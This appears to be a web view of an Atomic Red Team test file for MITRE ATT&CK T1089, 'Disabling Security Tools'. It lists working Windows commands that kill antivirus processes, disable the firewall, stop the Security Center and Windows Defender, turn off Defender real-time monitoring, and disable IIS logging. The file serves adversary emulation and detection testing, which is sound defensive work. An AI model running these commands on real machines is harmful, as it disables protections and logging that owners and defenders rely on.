security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
28ac11f0a193c856a982b508dfdcf3fb66d7c8e9
atomic-red-team/Windows/Defense_Evasion/Disabling_Security_Tools.md
T
rahmatnurfauzi 82f4f6078b Create Disabling_Security_Tools.md
2018-02-25 17:01:31 +07:00

841 B
Raw Blame History

Disabling Security Tools

MITRE ATT&CK Technique: T1089

Terminate Anti-Virus Processes

Taskkill /F /IM avprocess.exe

Disable Firewall

netsh firewall set opmode disable

Stop Windows Security Center

net stop wscsvc

Stop Windows Defender

Windows 7/8

net stop windefend

Windows 10

PS > Set-MpPreference -DisableRealtimeMonitoring $true

Disable Default Web Site Logging IIS 7

Disable Default Web Site Logging IIS 7

%windir%\system32\inetsrv\appcmd.exe set config "Default Web Site" -section:system.webServer/httpLogging /dontLog:"True" /commit:apphost

Restart Default Web Site IIS 7

%windir%\system32\inetsrv\appcmd.exe stop site /site.name:"Default Web Site" && %windir%\system32\inetsrv\appcmd.exe start site /site.name:"Default Web Site"

Reference in New Issue View Git Blame Copy Permalink